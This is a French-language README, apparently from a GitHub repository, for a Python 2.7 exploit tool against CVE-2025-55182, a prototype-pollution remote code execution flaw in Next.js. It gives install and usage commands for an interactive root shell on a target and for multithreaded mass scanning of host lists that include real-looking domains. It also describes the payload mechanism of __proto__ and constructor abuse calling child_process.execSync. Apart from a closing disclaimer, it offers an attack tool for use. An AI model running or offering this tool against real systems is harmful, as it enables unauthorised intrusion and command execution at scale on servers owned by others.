
Outil d'exploitation CVE-2025-55182 – Exploit Python 2.7 pour une pollution de prototype Next.js menant à une RCE
Un exploit Python 2.7 pour CVE-2025-55182 – une vulnérabilité critique de pollution de prototype / exécution de code à distance (RCE) dans les applications Next.js.
Cet outil permet à la fois un shell interactif sur cible unique et un scan de masse de plusieurs hôtes avec multithreading, sortie colorée et repli automatique vers HTTPS.
https:// si aucun protocole n'est fourniid en n'importe quelle commande (whoami, ls, etc.)requests (facile à installer)requests – installez‑la avec :
pip install requests
· Un terminal supportant les couleurs ANSI (la plupart des terminaux Linux/macOS, Windows Terminal, PowerShell)
📦 Installation
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
Rendre le script exécutable (optionnel) :
chmod +x CVE-2025-55182.py
🎯 Utilisation
python2 CVE-2025-55182.py https://target.com
ou sans protocole (HTTPS est ajouté automatiquement) :
python2 CVE-2025-55182.py target.com
Une fois connecté et vérifié vulnérable, vous obtenez une invite de shell :
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
Commandes intégrées :
exit / quit – fermer le shellclear – effacer l'écranhelp – afficher l'aidePréparez un fichier avec une cible par ligne (avec ou sans http/https) :
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
Lancez le scan de masse (par défaut : 10 threads, commande id, fichier de sortie res.txt) :
python2 CVE-2025-55182.py targets.txt
Personnalisez les threads, la commande et le fichier de sortie :
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
20 – nombre de threadswhoami – commande à exécuter sur chaque cible vulnérableresults.txt – fichier de sortie (seules les entrées vulnérables sont sauvegardées)Exemple de sortie du scan de masse :
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
Résultats sauvegardés (res.txt) :
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
L'exploit envoie une requête multipart/form-data fabriquée à un point d'accès Next.js (/login est ajouté si le chemin est vide).
Il abuse de la pollution de prototype (__proto__:then et constructor:constructor) pour injecter un préfixe malveillant qui exécute une commande système à l'aide de child_process.execSync().
Le serveur répond avec une redirection 303 contenant la sortie de la commande dans l'en-tête x-action-redirect (ou Location). L'outil extrait le résultat depuis /login?a=<sortie>.
Cet outil est destiné à des fins éducatives et aux tests de sécurité autorisés uniquement.
L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.
Vous devez avoir une autorisation écrite explicite du propriétaire du système cible avant d'utiliser cet exploit.
Vous pouvez consulter l'avertissement complet sur la couverture de Jenderal92. Rendez-vous ICI !!!